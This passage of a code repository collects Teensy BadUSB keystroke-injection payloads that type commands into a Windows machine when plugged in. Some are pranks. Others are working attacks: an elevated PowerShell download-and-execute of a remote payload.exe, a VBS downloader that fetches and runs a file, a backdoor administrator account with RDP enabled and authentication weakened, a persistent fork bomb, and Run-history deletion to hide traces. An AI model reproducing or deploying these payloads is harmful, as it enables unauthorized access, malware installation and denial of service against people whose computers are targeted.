PressKey(KEY_ENTER, 1); 52 | 53 | delay(1000); 54 | 55 | // Type our Facebook message. 56 | TypeLn("Automated Facebook post payload - https://github.com/Ozuru/Paensy/ and http://www.malware.cat/ for more information!"); 57 | 58 | // Tab our way to the post button. 59 | PressKey(KEY_TAB, 10); 60 | 61 | delay(1000); 62 | 63 | // Post the status. 64 | PressKey(KEY_ENTER, 1); 65 | 66 | delay(1000); 67 | 68 | // Close the tab. 69 | Ctrl(KEY_W); 70 | 71 | } 72 | 73 | void loop() { 74 | // Celebratory LED fluttering. 75 | LED_Flutter(200, 10); 76 | 77 | // P 78 | LED_MorseDot(); 79 | LED_MorseDash(); 80 | LED_MorseDash(); 81 | LED_MorseDot(); 82 | 83 | // W 84 | LED_MorseDot(); 85 | LED_MorseDash(); 86 | LED_MorseDash(); 87 | 88 | // N 89 | LED_MorseDash(); 90 | LED_MorseDot(); 91 | 92 | // 3 93 | LED_MorseDot(); 94 | LED_MorseDot(); 95 | LED_MorseDot(); 96 | LED_MorseDash(); 97 | LED_MorseDash(); 98 | 99 | // D 100 | LED_MorseDash(); 101 | LED_MorseDot(); 102 | LED_MorseDot(); 103 | 104 | // Flutter again. 105 | LED_Flutter(200, 10); 106 | } -------------------------------------------------------------------------------- /Payloads/powershell-admin-download-execute.ino: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Teensy ( https://www.pjrc.com/teensy/ ) 4 | 5 | Payload: powershell-admin-download-execute 6 | 7 | Description: Uses powershell to download and execute a file as administrator from a webserver. 8 | 9 | Concept: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Windows-10-%3A-Download-and-execute-file-with-Powershell 10 | 11 | Created by Kleo Bercero - @kbeflo - kbeflo@gmail.com 12 | 13 | */ 14 | 15 | #include 16 | 17 | int ds = 500; 18 | 19 | void setup() { 20 | 21 | // Configure the delay that everything else scales off of. 22 | SetDelay(200); 23 | // Configure the delay that the Morse code uses. 24 | SetMorseDelay(250); 25 | 26 | // Perform an initial delay to give the USB time to prepare. 27 | PerformInitDelay(); 28 | 29 | // LED pin number, 13 for 3.1 30 | // 11 for 2 and 2.x 31 | SetLEDPin(13); 32 | // Put the pin into output mode 33 | pinMode(LED_PIN, OUTPUT); 34 | // Turn on the LED pin so we know the device is running. 35 | digitalWrite(LED_PIN, HIGH); 36 | delay(3000); 37 | // Run 38 | Keyboard.set_modifier(MODIFIERKEY_GUI); 39 | Keyboard.set_key1(KEY_R); 40 | Keyboard.send_now(); 41 | Keyboard.set_modifier(0); 42 | Keyboard.set_key1(0); 43 | Keyboard.send_now(); 44 | delay(500); 45 | // Run powershell as administrator 46 | Keyboard.print("powershell Start-Process powershell -Verb runAs"); 47 | Keyboard.set_key1(KEY_ENTER); 48 | Keyboard.send_now(); 49 | Keyboard.set_modifier(0); 50 | Keyboard.set_key1(0); 51 | Keyboard.send_now(); 52 | // Adjust delay depending on target machine, as initial powershell startup takes time 53 | delay(8000); 54 | Keyboard.set_modifier(MODIFIERKEY_ALT); 55 | Keyboard.set_key1(KEY_Y); 56 | Keyboard.send_now(); 57 | Keyboard.set_modifier(0); 58 | Keyboard.set_key1(0); 59 | Keyboard.send_now(); 60 | delay(3000); 61 | // Modify 127.0.0.1 with your IP address and payload.exe with your payload name 62 | Keyboard.print("$down = New-Object System.Net.WebClient; $url = 'http://127.0.0.1/payload.exe'; $file = 'payload.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;"); 63 | Keyboard.send_now(); 64 | Keyboard.set_modifier(0); 65 | Keyboard.set_key1(0); 66 | Keyboard.send_now(); 67 | delay(500); 68 | Keyboard.set_key1(KEY_ENTER); 69 | Keyboard.send_now(); 70 | Keyboard.set_modifier(0); 71 | Keyboard.set_key1(0); 72 | Keyboard.send_now(); 73 | delay(500); 74 | // Clear run command history 75 | Keyboard.set_modifier(MODIFIERKEY_GUI); 76 | Keyboard.set_key1(KEY_R); 77 | Keyboard.send_now(); 78 | Keyboard.set_modifier(0); 79 | Keyboard.set_key1(0); 80 | Keyboard.send_now(); 81 | delay(500); 82 | Keyboard.print("reg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f"); 83 | Keyboard.set_key1(KEY_ENTER); 84 | Keyboard.send_now(); 85 | Keyboard.set_modifier(0); 86 | Keyboard.set_key1(0); 87 | Keyboard.send_now(); 88 | delay(500); 89 | 90 | } 91 | 92 | void loop() 93 | { 94 | // blink quickly when complete 95 | digitalWrite(LED_PIN, HIGH); 96 | delay(ds/2); 97 | digitalWrite(LED_PIN, LOW); 98 | delay(ds/2); 99 | } 100 | -------------------------------------------------------------------------------- /Payloads/You_spin_me__round.ino: -------------------------------------------------------------------------------- 1 | /* 2 | * You spin me 'round payload for Teensy. 3 | * Created by B3H1NDu/Keith Anderson 4 | * Inspired by the many rick roll payloads 5 | * and a soviet womble video where he uses 6 | * the song. 7 | * 8 | * A new take on the classic rick-roll payload. 9 | * Opens up a very fitting music video on youtube 10 | * and rotates the screen for a little bit. 11 | * 12 | * You may need to adjust delays for slower computers 13 | * or internet connections. 14 | */ 15 | #include 16 | 17 | void setup() { 18 | 19 | // Configure the delay that everything else scales off of. 20 | SetDelay(200); 21 | // Configure the delay that the Morse code uses. 22 | SetMorseDelay(250); 23 | 24 | // Perform an initial delay to give the USB time to prepare. 25 | PerformInitDelay(); 26 | 27 | // LED pin number, 13 for 3.1 28 | // 11 for 2 and 2.x 29 | SetLEDPin(13); 30 | 31 | // Put the pin into output mode 32 | pinMode(LED_PIN, OUTPUT); 33 | 34 | // Turn on the LED pin so we know the device is running. 35 | digitalWrite(LED_PIN, HIGH); 36 | 37 | delay(1000); 38 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); 39 | Keyboard.set_key1(KEY_R); 40 | Keyboard.send_now(); 41 | Keyboard.set_modifier(0); 42 | Keyboard.set_key1(0); 43 | Keyboard.send_now(); 44 | delay(1500); 45 | Keyboard.print("https://youtu.be/PGNiXGX2nLU?t=61"); //You Spin Me Round! 46 | Keyboard.set_key1(KEY_ENTER); 47 | Keyboard.send_now(); 48 | Keyboard.set_key1(0); 49 | Keyboard.send_now(); 50 | delay(6000); 51 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); 52 | Keyboard.set_key1(KEY_RIGHT); 53 | Keyboard.send_now(); 54 | delay(250); 55 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); 56 | Keyboard.set_key1(KEY_DOWN); 57 | Keyboard.send_now(); 58 | delay(250); 59 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); 60 | Keyboard.set_key1(KEY_LEFT); 61 | Keyboard.send_now(); 62 | delay(250); 63 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); 64 | Keyboard.set_key1(KEY_UP); 65 | Keyboard.send_now(); 66 | delay(250); 67 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); 68 | Keyboard.set_key1(KEY_RIGHT); 69 | Keyboard.send_now(); 70 | delay(250); 71 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); 72 | Keyboard.set_key1(KEY_DOWN); 73 | Keyboard.send_now(); 74 | delay(250); 75 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); 76 | Keyboard.set_key1(KEY_LEFT); 77 | Keyboard.send_now(); 78 | delay(250); 79 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); 80 | Keyboard.set_key1(KEY_UP); 81 | Keyboard.send_now(); 82 | delay(250); 83 | Keyboard.set_modifier(0); 84 | Keyboard.set_key1(0); 85 | Keyboard.send_now(); 86 | } 87 | 88 | void loop() { 89 | // Celebratory LED fluttering. 90 | LED_Flutter(200, 10); 91 | 92 | // P 93 | LED_MorseDot(); 94 | LED_MorseDash(); 95 | LED_MorseDash(); 96 | LED_MorseDot(); 97 | 98 | // W 99 | LED_MorseDot(); 100 | LED_MorseDash(); 101 | LED_MorseDash(); 102 | 103 | // N 104 | LED_MorseDash(); 105 | LED_MorseDot(); 106 | 107 | // 3 108 | LED_MorseDot(); 109 | LED_MorseDot(); 110 | LED_MorseDot(); 111 | LED_MorseDash(); 112 | LED_MorseDash(); 113 | 114 | // D 115 | LED_MorseDash(); 116 | LED_MorseDot(); 117 | LED_MorseDot(); 118 | 119 | // Flutter again. 120 | LED_Flutter(200, 10); 121 | } 122 | -------------------------------------------------------------------------------- /Payloads/Bye_Explorer.ino: -------------------------------------------------------------------------------- 1 | /* 2 | * Bye Explorer script for Teensy 3 | * Created by B3H1NDu/Keith Anderson 4 | * 5 | * Runs CMD, exits windows explorer. 6 | * 7 | * Super fun, leads to a lot of confusion. 8 | * 9 | * To get explorer back, hit CTRL+ALT+DELETE, 10 | * click "Task Manager", right click on a task 11 | * click "Run new task", type "explorer.exe". 12 | */ 13 | 14 | #include 15 | 16 | void setup() { 17 | 18 | // Configure the delay that everything else scales off of. 19 | SetDelay(200); 20 | // Configure the delay that the Morse code uses. 21 | SetMorseDelay(250); 22 | 23 | // Perform an initial delay to give the USB time to prepare. 24 | PerformInitDelay(); 25 | 26 | // LED pin number, 13 for 3.1 27 | // 11 for 2 and 2.x 28 | SetLEDPin(13); 29 | 30 | // Put the pin into output mode 31 | pinMode(LED_PIN, OUTPUT); 32 | 33 | // Turn on the LED pin so we know the device is running. 34 | digitalWrite(LED_PIN, HIGH); 35 | 36 | RunCommand("cmd"); 37 | 38 | delay(3000); 39 | 40 | TypeLn("taskkill /f /im explorer.exe"); 41 | 42 | delay(500); 43 | PressKey(KEY_ENTER, 1); 44 | 45 | delay(3000); 46 | TypeLn("exit"); 47 | delay(500); 48 | PressKey(KEY_ENTER, 1); 49 | 50 | } 51 | 52 | void loop() { 53 | // Celebratory LED fluttering. 54 | LED_Flutter(200, 10); 55 | 56 | // P 57 | LED_MorseDot(); 58 | LED_MorseDash(); 59 | LED_MorseDash(); 60 | LED_MorseDot(); 61 | 62 | // W 63 | LED_MorseDot(); 64 | LED_MorseDash(); 65 | LED_MorseDash(); 66 | 67 | // N 68 | LED_MorseDash(); 69 | LED_MorseDot(); 70 | 71 | // 3 72 | LED_MorseDot(); 73 | LED_MorseDot(); 74 | LED_MorseDot(); 75 | LED_MorseDash(); 76 | LED_MorseDash(); 77 | 78 | // D 79 | LED_MorseDash(); 80 | LED_MorseDot(); 81 | LED_MorseDot(); 82 | 83 | // Flutter again. 84 | LED_Flutter(200, 10); 85 | } 86 | -------------------------------------------------------------------------------- /Payloads/add_user+enable_rdp.ino: -------------------------------------------------------------------------------- 1 | /* 2 | TeensyDuino ( BadUSB) Like a Rubber Ducky ) 3 | 4 | You can buy Teensy >> ( https://www.pjrc.com/teensy/teensyduino.html ) 5 | Tutorial >> ( https://www.pjrc.com/teensy/teensyduino.html ) , Youtube.com or Google.com :> 6 | PAYLOAD : 7 | 8 | CREATE USER WITH ADMINISTRATOR - ENABLE REMOTE DESTKOP :> 9 | 10 | @ Edo -m- you can contact me in screetsec@gmail.com 11 | */ 12 | 13 | 14 | 15 | int ds = 500; 16 | 17 | #if defined(CORE_TEENSY) 18 | #define LED_PIN 13 19 | #endif 20 | 21 | void setup() 22 | { 23 | 24 | // allow controlling LED 25 | pinMode(LED_PIN, OUTPUT); 26 | // turn the LED on while running 27 | digitalWrite(LED_PIN, HIGH); 28 | 29 | delay(3000); 30 | show_desktop(); 31 | 32 | delay(3000); 33 | cmd_admin(); 34 | 35 | delay(3000); 36 | send_altyes(); 37 | 38 | delay(1000); 39 | Keyboard.print("ipconfig"); 40 | Keyboard.set_key1(KEY_ENTER); 41 | Keyboard.send_now(); 42 | Keyboard.set_key1(0); 43 | Keyboard.send_now(); 44 | 45 | delay(1000); 46 | Keyboard.print("net user /add [username] [password]"); 47 | Keyboard.set_key1(KEY_ENTER); 48 | Keyboard.send_now(); 49 | Keyboard.set_key1(0); 50 | Keyboard.send_now(); 51 | 52 | delay(1000); 53 | Keyboard.print("net localgroup administrators [username] /add"); 54 | Keyboard.set_key1(KEY_ENTER); 55 | Keyboard.send_now(); 56 | Keyboard.set_key1(0); 57 | Keyboard.send_now(); 58 | 59 | delay(1000); 60 | Keyboard.print("powershell set-ItemProperty -Path \'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server'-name \"fDenyTSConnections\" -Value 0"); /* Remote Desktop Command */ 61 | Keyboard.set_key1(KEY_ENTER); 62 | Keyboard.send_now(); 63 | Keyboard.set_key1(0); 64 | Keyboard.send_now(); 65 | 66 | 67 | delay(1000); 68 | Keyboard.print("Powershell set-ItemProperty -Path \'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"UserAuthentication\" -Value 0"); /*Disable secure RDP authentication */ 69 | Keyboard.set_key1(KEY_ENTER); 70 | Keyboard.send_now(); 71 | Keyboard.set_key1(0); 72 | Keyboard.send_now(); 73 | 74 | delay(2000); 75 | Keyboard.print("exit"); 76 | Keyboard.set_key1(KEY_ENTER); 77 | Keyboard.send_now(); 78 | Keyboard.set_key1(0); 79 | Keyboard.send_now(); 80 | 81 | } 82 | 83 | void loop(){ 84 | // blink quickly when complete 85 | digitalWrite(LED_PIN, HIGH); 86 | delay(ds/2); 87 | digitalWrite(LED_PIN, LOW); 88 | delay(ds/2); 89 | } 90 | 91 | void show_desktop(){ 92 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); 93 | Keyboard.set_key1(KEY_D); 94 | Keyboard.send_now(); 95 | delay(500); 96 | Keyboard.set_modifier(0); 97 | Keyboard.set_key1(0); 98 | Keyboard.send_now(); 99 | } 100 | void send_altyes(){ 101 | delay(1000); 102 | Keyboard.set_modifier(MODIFIERKEY_ALT); 103 | Keyboard.set_key1(KEY_Y); 104 | Keyboard.send_now(); 105 | delay(100); 106 | 107 | Keyboard.set_modifier(0); 108 | Keyboard.set_key1(0); 109 | Keyboard.send_now(); 110 | } 111 | 112 | void cmd_admin(){ 113 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); 114 | Keyboard.send_now(); 115 | delay(1000); 116 | Keyboard.set_modifier(0); 117 | Keyboard.send_now(); 118 | delay(2000); 119 | Keyboard.print("cmd"); 120 | 121 | delay(2000); 122 | Keyboard.set_modifier(MODIFIERKEY_CTRL); 123 | Keyboard.send_now(); 124 | Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT); 125 | Keyboard.send_now(); 126 | Keyboard.set_key1(KEY_ENTER); 127 | Keyboard.send_now(); 128 | 129 | delay(200); 130 | Keyboard.set_modifier(0); 131 | Keyboard.set_key1(0); 132 | Keyboard.send_now(); 133 | } 134 | -------------------------------------------------------------------------------- /Payloads/BadUSB_LockYourComputer.ino: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void setup() { 4 | 5 | // Configure the delay that everything else scales off of. 6 | SetDelay(100); 7 | // Configure the delay that the Morse code uses. 8 | SetMorseDelay(250); 9 | 10 | // Perform an initial delay to give the USB time to prepare. 11 | PerformInitDelay(); 12 | 13 | // LED pin number, 13 for 3.1 14 | // 11 for 2 and 2.x 15 | SetLEDPin(13); 16 | 17 | // Put the pin into output mode 18 | pinMode(LED_PIN, OUTPUT); 19 | 20 | // Turn on the LED pin so we know the device is running. 21 | digitalWrite(LED_PIN, HIGH); 22 | 23 | delay(5000); 24 | 25 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); 26 | Keyboard.set_key1(KEY_R); 27 | Keyboard.send_now(); 28 | 29 | delay(500); 30 | Keyboard.set_modifier(0); 31 | Keyboard.set_key1(0); 32 | Keyboard.send_now(); 33 | Keyboard.print("notepad.exe"); 34 | Keyboard.set_key1(KEY_ENTER); 35 | Keyboard.send_now(); 36 | Keyboard.set_key1(0); 37 | Keyboard.send_now(); 38 | 39 | delay(1000); 40 | 41 | // Start typing the ASCII art. 42 | TypeLn(" , ,\ ,'\,'\ ,'\ ,\ ,"); 43 | 44 | TypeLn(" , ,\/ \' `' ` ' /|"); 45 | 46 | TypeLn(" |\/ |"); 47 | 48 | TypeLn(" : |"); 49 | 50 | TypeLn(" : |"); 51 | 52 | TypeLn(" | |"); 53 | 54 | TypeLn(" | |"); 55 | 56 | TypeLn(" : -. _|"); 57 | 58 | TypeLn(" : \ `."); 59 | 60 | TypeLn(" | ________:______\\"); 61 | 62 | TypeLn(" : ,'o / o ,"); 63 | 64 | TypeLn(" : \ ,'-----./"); 65 | 66 | TypeLn(" \_ `--.--' )"); 67 | 68 | TypeLn(" ,` `. ,---'|"); 69 | 70 | TypeLn(" : ` |"); 71 | 72 | TypeLn(" `,-' |"); 73 | 74 | TypeLn(" / ,---. ,'"); 75 | 76 | TypeLn(" ,-' `-,------'"); 77 | 78 | TypeLn(" `. ,--'"); 79 | 80 | TypeLn(" `-.____/"); 81 | 82 | TypeLn(" \\"); 83 | 84 | // Go two lines down. 85 | PressKey(KEY_ENTER, 2); 86 | 87 | TypeLn("I will learn to lock my computer."); 88 | 89 | TypeLn("I will learn to lock my computer."); 90 | 91 | TypeLn("I will learn to lock my computer."); 92 | 93 | TypeLn("I will learn to lock my computer."); 94 | 95 | TypeLn("I will learn to lock my computer."); 96 | 97 | TypeLn("I will learn to lock my computer."); 98 | 99 | TypeLn("I will learn to lock my computer."); 100 | 101 | TypeLn("I will learn to lock my computer."); 102 | 103 | TypeLn("I will learn to lock my computer."); 104 | 105 | TypeLn("I will learn to lock my computer."); 106 | 107 | // Go three lines down. 108 | PressKey(KEY_ENTER, 3); 109 | 110 | TypeLn("There, just like Bart Simpson: please remember to lock your computer."); 111 | 112 | // Open up the window menu. 113 | Alt(KEY_SPACE); 114 | 115 | // Maximize the window. 116 | PressKey(KEY_X, 1); 117 | 118 | } 119 | 120 | void loop() { 121 | // Celebratory LED fluttering. 122 | LED_Flutter(200, 10); 123 | 124 | // P 125 | LED_MorseDot(); 126 | LED_MorseDash(); 127 | LED_MorseDash(); 128 | LED_MorseDot(); 129 | 130 | // W 131 | LED_MorseDot(); 132 | LED_MorseDash(); 133 | LED_MorseDash(); 134 | 135 | // N 136 | LED_MorseDash(); 137 | LED_MorseDot(); 138 | 139 | // 3 140 | LED_MorseDot(); 141 | LED_MorseDot(); 142 | LED_MorseDot(); 143 | LED_MorseDash(); 144 | LED_MorseDash(); 145 | 146 | // D 147 | LED_MorseDash(); 148 | LED_MorseDot(); 149 | LED_MorseDot(); 150 | 151 | // Flutter again. 152 | LED_Flutter(200, 10); 153 | } 154 | -------------------------------------------------------------------------------- /Payloads/wallpaper-prank.ino: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Teensy ( https://www.pjrc.com/teensy/ ) 4 | 5 | Payload: wallpaper-prank 6 | 7 | Description: Minimize all windows, take screenshot, disable desktop icons, saves screenshot and sets as wallpaper. Tested on Windows 10. 8 | 9 | Concept: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Wallpaper-prank 10 | 11 | Created by Kleo Bercero - @kbeflo - kbeflo@gmail.com 12 | 13 | */ 14 | 15 | #include 16 | 17 | int ds = 500; 18 | 19 | void setup() { 20 | 21 | // Configure the delay that everything else scales off of. 22 | SetDelay(200); 23 | // Configure the delay that the Morse code uses. 24 | SetMorseDelay(250); 25 | 26 | // Perform an initial delay to give the USB time to prepare. 27 | PerformInitDelay(); 28 | 29 | // LED pin number, 13 for 3.1 30 | // 11 for 2 and 2.x 31 | SetLEDPin(13); 32 | // Put the pin into output mode 33 | pinMode(LED_PIN, OUTPUT); 34 | // Turn on the LED pin so we know the device is running. 35 | digitalWrite(LED_PIN, HIGH); 36 | delay(3000); 37 | // Show desktop 38 | Keyboard.set_modifier(MODIFIERKEY_GUI); 39 | Keyboard.set_key1(KEY_D); 40 | Keyboard.send_now(); 41 | Keyboard.set_modifier(0); 42 | Keyboard.set_key1(0); 43 | Keyboard.send_now(); 44 | delay(500); 45 | // Printscreen 46 | Keyboard.set_key1(KEY_PRINTSCREEN); 47 | Keyboard.send_now(); 48 | Keyboard.set_modifier(0); 49 | Keyboard.set_key1(0); 50 | Keyboard.send_now(); 51 | delay(500); 52 | // Hide desktop icons 53 | Keyboard.set_key1(KEY_MENU); 54 | Keyboard.send_now(); 55 | Keyboard.set_key1(KEY_V); 56 | Keyboard.send_now(); 57 | Keyboard.set_key1(KEY_D); 58 | Keyboard.send_now(); 59 | Keyboard.set_modifier(0); 60 | Keyboard.set_key1(0); 61 | Keyboard.send_now(); 62 | delay(500); 63 | // Open paint 64 | Keyboard.set_modifier(MODIFIERKEY_GUI); 65 | Keyboard.set_key1(KEY_R); 66 | Keyboard.send_now(); 67 | Keyboard.set_modifier(0); 68 | Keyboard.set_key1(0); 69 | Keyboard.send_now(); 70 | delay(500); 71 | Keyboard.print("mspaint"); 72 | Keyboard.set_key1(KEY_ENTER); 73 | Keyboard.send_now(); 74 | Keyboard.set_modifier(0); 75 | Keyboard.set_key1(0); 76 | Keyboard.send_now(); 77 | delay(500); 78 | // Paste Printscreen 79 | Keyboard.set_modifier(MODIFIERKEY_CTRL); 80 | Keyboard.send_now(); 81 | Keyboard.set_key1(KEY_V); 82 | Keyboard.send_now(); 83 | Keyboard.set_modifier(0); 84 | Keyboard.set_key1(0); 85 | Keyboard.send_now(); 86 | delay(500); 87 | // Save as wallpaper 88 | Keyboard.set_modifier(MODIFIERKEY_ALT); 89 | Keyboard.set_key1(KEY_F); 90 | Keyboard.send_now(); 91 | Keyboard.set_modifier(0); 92 | Keyboard.set_key1(0); 93 | Keyboard.send_now(); 94 | delay(500); 95 | Keyboard.set_key1(KEY_B); 96 | Keyboard.send_now(); 97 | Keyboard.set_modifier(0); 98 | Keyboard.set_key1(0); 99 | Keyboard.send_now(); 100 | delay(500); 101 | Keyboard.set_key1(KEY_ENTER); 102 | Keyboard.send_now(); 103 | Keyboard.set_modifier(0); 104 | Keyboard.set_key1(0); 105 | Keyboard.send_now(); 106 | delay(500); 107 | Keyboard.print("26xxm74b5i.png"); 108 | Keyboard.send_now(); 109 | Keyboard.set_modifier(0); 110 | Keyboard.set_key1(0); 111 | Keyboard.send_now(); 112 | delay(500); 113 | Keyboard.set_key1(KEY_ENTER); 114 | Keyboard.send_now(); 115 | Keyboard.set_modifier(0); 116 | Keyboard.set_key1(0); 117 | Keyboard.send_now(); 118 | delay(500); 119 | // Close paint 120 | Keyboard.set_modifier(MODIFIERKEY_ALT); 121 | Keyboard.set_key1(KEY_F4); 122 | Keyboard.send_now(); 123 | Keyboard.set_modifier(0); 124 | Keyboard.set_key1(0); 125 | Keyboard.send_now(); 126 | delay(1000); 127 | // Clear run command history 128 | Keyboard.set_modifier(MODIFIERKEY_GUI); 129 | Keyboard.set_key1(KEY_R); 130 | Keyboard.send_now(); 131 | Keyboard.set_modifier(0); 132 | Keyboard.set_key1(0); 133 | Keyboard.send_now(); 134 | delay(500); 135 | Keyboard.print("reg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f"); 136 | Keyboard.set_key1(KEY_ENTER); 137 | Keyboard.send_now(); 138 | Keyboard.set_modifier(0); 139 | Keyboard.set_key1(0); 140 | Keyboard.send_now(); 141 | delay(500); 142 | 143 | } 144 | 145 | void loop() 146 | { 147 | // blink quickly when complete 148 | digitalWrite(LED_PIN, HIGH); 149 | delay(ds/2); 150 | digitalWrite(LED_PIN, LOW); 151 | delay(ds/2); 152 | } 153 | -------------------------------------------------------------------------------- /Payloads/BadUSB_DownloadExecute.ino: -------------------------------------------------------------------------------- 1 | /*** 2 | * ______ _ _ _____ _ 3 | * | _ \ | | | | _ | ___| | | 4 | * | | | |_____ ___ __ | | ___ __ _ __| | _| |_ | |____ _____ ___ _ _| |_ ___ 5 | * | | | / _ \ \ /\ / / '_ \| |/ _ \ / _` |/ _` | |_ _| | __\ \/ / _ \/ __| | | | __/ _ \ 6 | * | |/ / (_) \ V V /| | | | | (_) | (_| | (_| | |_| | |___> < __/ (__| |_| | || __/ 7 | * |___/ \___/ \_/\_/ |_| |_|_|\___/ \__,_|\__,_| \____/_/\_\___|\___|\__,_|\__\___| 8 | * 9 | * 10 | * _ _____ 11 | * | | | _ | 12 | * | |__ _ _ | | | |_____ _ _ __ _ _ 13 | * | '_ \| | | | | | | |_ / | | | '__| | | | 14 | * | |_) | |_| | \ \_/ // /| |_| | | | |_| | 15 | * |_.__/ \__, | \___//___|\__,_|_| \__,_| 16 | * __/ | 17 | * |___/ 18 | */ 19 | 20 | #include 21 | 22 | void setup() { 23 | 24 | String fileName = "CONFIGURE ME (example: program.exe)", fileLink = "CONFIGURE ME (example: http://www.google.com/program.exe"; 25 | 26 | // Configure the delay that everything else scales off of. 27 | SetDelay(500); 28 | // Configure the delay that the Morse code uses. 29 | SetMorseDelay(250); 30 | 31 | // Perform an initial delay to give the USB time to prepare. 32 | PerformInitDelay(); 33 | 34 | // LED pin number, 13 for 3.1 35 | // 11 for 2 and 2.x 36 | SetLEDPin(13); 37 | 38 | // Put the pin into output mode 39 | pinMode(LED_PIN, OUTPUT); 40 | 41 | // Turn on the LED pin so we know the device is running. 42 | digitalWrite(LED_PIN, HIGH); 43 | 44 | delay(1000); 45 | 46 | // Open up the command prompt in a hidden fashion. 47 | RunCommand("cmd /Q /D /T:7F /F:OFF /V:ON /K"); 48 | 49 | delay(500); 50 | 51 | // Delete the script if it exists. 52 | TypeLn("del download.vbs"); 53 | 54 | // Start recording what's typed. 55 | TypeLn("copy con download.vbs"); 56 | 57 | // Start typing the download script. 58 | TypeLn("Set args = WScript.Arguments:a = split(args(0), \"/\")(UBound(split(args(0),\"/\")))"); 59 | 60 | TypeLn("Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\"):objXMLHTTP.open \"GET\", args(0), false:objXMLHTTP.send()"); 61 | 62 | TypeLn("If objXMLHTTP.Status = 200 Then"); 63 | 64 | TypeLn("Set objADOStream = CreateObject(\"ADODB.Stream\"):objADOStream.Open"); 65 | 66 | TypeLn("objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0"); 67 | 68 | TypeLn("Set objFSO = Createobject(\"Scripting.FileSystemObject\"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a"); 69 | 70 | TypeLn("objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing "); 71 | 72 | TypeLn("End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing"); 73 | 74 | // Save the screen contents. 75 | Ctrl(KEY_Z); 76 | 77 | PressKey(KEY_ENTER, 1); 78 | 79 | // Download our file using our script. 80 | TypeLn("cscript download.vbs " + fileLink); 81 | 82 | // Execute the file and then exit. 83 | TypeLn(fileName + " && exit"); 84 | 85 | } 86 | 87 | void loop() { 88 | // Celebratory LED fluttering. 89 | LED_Flutter(200, 10); 90 | 91 | // P 92 | LED_MorseDot(); 93 | LED_MorseDash(); 94 | LED_MorseDash(); 95 | LED_MorseDot(); 96 | 97 | // W 98 | LED_MorseDot(); 99 | LED_MorseDash(); 100 | LED_MorseDash(); 101 | 102 | // N 103 | LED_MorseDash(); 104 | LED_MorseDot(); 105 | 106 | // 3 107 | LED_MorseDot(); 108 | LED_MorseDot(); 109 | LED_MorseDot(); 110 | LED_MorseDash(); 111 | LED_MorseDash(); 112 | 113 | // D 114 | LED_MorseDash(); 115 | LED_MorseDot(); 116 | LED_MorseDot(); 117 | 118 | // Flutter again. 119 | LED_Flutter(200, 10); 120 | } -------------------------------------------------------------------------------- /Payloads/windows-forkbomb.ino: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Teensy ( https://www.pjrc.com/teensy/ ) 4 | 5 | Payload: windows-forkbomb 6 | 7 | Disclaimer: Use at own risk, the functions used in this program will render your machine virtually useless. 8 | 9 | Description: Opens a command prompt as administrator with run, uses con copy to create fork bomb batch. 10 | 11 | Then save as .bat file under the startup folder and runs every startup. 12 | 13 | You can optionally choose to avoid executing the fork bomb after writing the batch file. 14 | 15 | Using US Keyboard Layout. Modify delays depending on the target machine. Tested Windows 7 and Windows 10. 16 | 17 | Concept: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---fork-bomb, https://forums.hak5.org/index.php?/topic/39367-mr-robot-hack-optimized-payload/&do=findComment&comment=282928 18 | 19 | Created by Kleo Bercero - @kbeflo - kbeflo@gmail.com 20 | 21 | */ 22 | 23 | #include 24 | 25 | int ds = 500; 26 | 27 | void setup() { 28 | 29 | // Configure the delay that everything else scales off of. 30 | SetDelay(200); 31 | // Configure the delay that the Morse code uses. 32 | SetMorseDelay(250); 33 | 34 | // Perform an initial delay to give the USB time to prepare. 35 | PerformInitDelay(); 36 | 37 | // LED pin number, 13 for 3.1 38 | // 11 for 2 and 2.x 39 | SetLEDPin(13); 40 | // Put the pin into output mode 41 | pinMode(LED_PIN, OUTPUT); 42 | // Turn on the LED pin so we know the device is running. 43 | digitalWrite(LED_PIN, HIGH); 44 | delay(3000); 45 | // Run cmd as administrator on small window with white background, yellow text and clear run command history 46 | Keyboard.set_modifier(MODIFIERKEY_GUI); 47 | Keyboard.set_key1(KEY_R); 48 | Keyboard.send_now(); 49 | Keyboard.set_modifier(0); 50 | Keyboard.set_key1(0); 51 | Keyboard.send_now(); 52 | delay(500); 53 | Keyboard.print("powershell -NoP -NonI -W Hidden -Exec Bypass \"Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18® delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f' -Verb runAs\""); 54 | Keyboard.set_key1(KEY_ENTER); 55 | Keyboard.send_now(); 